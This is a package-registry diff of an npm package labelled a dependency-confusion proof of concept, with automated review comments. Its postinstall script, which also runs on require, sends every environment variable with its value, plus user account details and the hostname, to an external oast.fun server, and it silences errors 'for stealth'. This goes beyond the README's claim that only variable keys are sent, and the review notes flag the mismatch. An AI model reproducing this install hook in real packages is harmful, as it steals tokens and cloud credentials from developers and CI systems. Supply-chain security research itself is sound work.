ember-simplepractice 0.0.1-poc
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +35 -0
- package/package.json +14 -0
- package/postinstall.js +66 -0
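--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,35 @@
+# ⚠️ SECURITY RESEARCH PoC: Dependency Confusion
+
+This package is part of a **bug bounty proof-of-concept** designed to demonstrate the impact of [dependency confusion](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) vulnerabilities in internal build systems.
+
+## 🚨 What This Package Does
+
+When installed, this package performs a **non-destructive metadata callback** to a controlled server to demonstrate that it was pulled and executed. The callback includes basic system information such as:
+
+- Hostname
+- Platform and architecture
+- Current working directory
+- Environment variable keys
+- Node.js version
+
+This data is used **solely for impact demonstration** and responsible disclosure.
+
+## ❗ WARNING
+
+**Do NOT use this package in production or internal environments.**
+
+It is intended for ethical testing only. Installing this package may result in remote code execution (RCE) under certain configurations, depending on how your build system handles third-party packages.
+
+## 🧠 Why This Exists
+
+This package helps security researchers and organizations identify vulnerable dependency resolution workflows. It is part of a broader effort to improve supply chain security and prevent malicious package injection.
+
+## 📬 Contact
+
+If you believe this package was pulled by your system and want to learn more or coordinate disclosure, please reach out:
+
+**Email:** shubhaskargaur99@gmail.com
+
+## 🛡️ Ethical Use
+
+This package does **not** perform any destructive actions. It is designed for **responsible security research** and follows ethical guidelines for bug bounty programs.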
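--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,14 @@
+{
+"name": "ember-simplepractice",
+"version": "0.0.1-poc",
+"description": "Safe PoC for dependency confusion POC.",
+"main": "postinstall.js",
+"scripts": {
+"postinstall": "node postinstall.js"
+},
+"author": "POC (safe)",
+"license": "MIT",
+"dependencies": {
+},
+"keywords": []
+}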
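Review bot: `"main": "postinstall.js"` makes the install hook double as the package's module entry, so a plain `require('ember-simplepractice')` from application code runs the same metadata callback again, outside npm's lifecycle and after the install-time banner has scrolled away. A PoC that only needs the install-time signal should keep `postinstall.js` reachable solely through `"scripts": { "postinstall": "node postinstall.js" }` and point `main` at an inert file or omit it. The `"description": "Safe PoC for dependency confusion POC."` is also the first thing a registry scanner or reviewer reads, so it should describe the actual payload the script sends rather than assert safety.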
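--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -0,0 +1,66 @@
+const https = require('https');
+const os = require('os');
+
+
+console.log(`
+============================================================
+⚠️ SECURITY RESEARCH NOTICE
+============================================================
+
+This package is part of a bug bounty proof-of-concept (PoC) targeting dependency confusion vulnerabilities.
+
+It was published to test whether internal systems mistakenly install public packages with the same name as private ones — a known supply chain risk.
+
+When installed, this package sends basic system metadata (e.g., hostname, platform, environment details) to a secure server for impact demonstration.
+
+❗ DO NOT use this package in production or sensitive environments.
+
+If you're seeing this message, your system may be vulnerable to dependency confusion — meaning it may be pulling packages from public sources when it shouldn't.
+
+This PoC is non-destructive and used strictly for ethical security research.
+
+To report this or for questions, contact: shubhaskargaur99@gmail.com
+============================================================
+`);
+
+
+setTimeout(() => {
+console.error("SECURITY RESEARCH PoC: Your system may be vulnerable to dependency confusion.");
+console.trace(); // shows stack trace without crashing
+}, 1000);
+
+
+
+function exfiltrate(data) {
+const payload = JSON.stringify(data);
+const options = {
+hostname: 'bjfuyjnlqqtwxidckpfozy4xovlu6xifm.oast.fun',
+port: 443,
+path: '/poc',
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': Buffer.byteLength(payload)
+}
+};
+
+const req = https.request(options, res => {
+res.on('data', () => {}); // consume response
+});
+
+req.on('error', () => {}); // suppress errors for stealth
+
+req.write(payload);
+req.end();
+}
+
+const data = {
+hostname: os.hostname(),
+platform: os.platform(),
+arch: os.arch(),
+userInfo: os.userInfo(),
+cwd: process.cwd(),
+env: process.env
+};
+
+exfiltrate(data);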
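Review bot: The `env: process.env` entry of the `data` object sends every environment variable with its value, and `userInfo: os.userInfo()` adds the local account details, while the README of this same release lists only "Environment variable keys" among the collected fields; on a CI runner that means registry tokens and cloud credentials leave the host during `postinstall`, which is not the "non-destructive metadata callback" the README describes. Matching the stated scope is a two-line change: `env: Object.keys(process.env)` and dropping the `userInfo` line (the README's "Node.js version" item, `process.version`, is the one listed field that is never sent). `req.on('error', () => {}); // suppress errors for stealth` also hides any failure of the callback, so a blocked egress is indistinguishable from a successful POST for the installing user; logging the error, e.g. `req.on('error', (err) => console.error('PoC callback failed:', err.message));`, keeps the demonstration auditable. Since `exfiltrate(data)` runs at module top level, the same callback fires whenever this file is loaded, not only at install time.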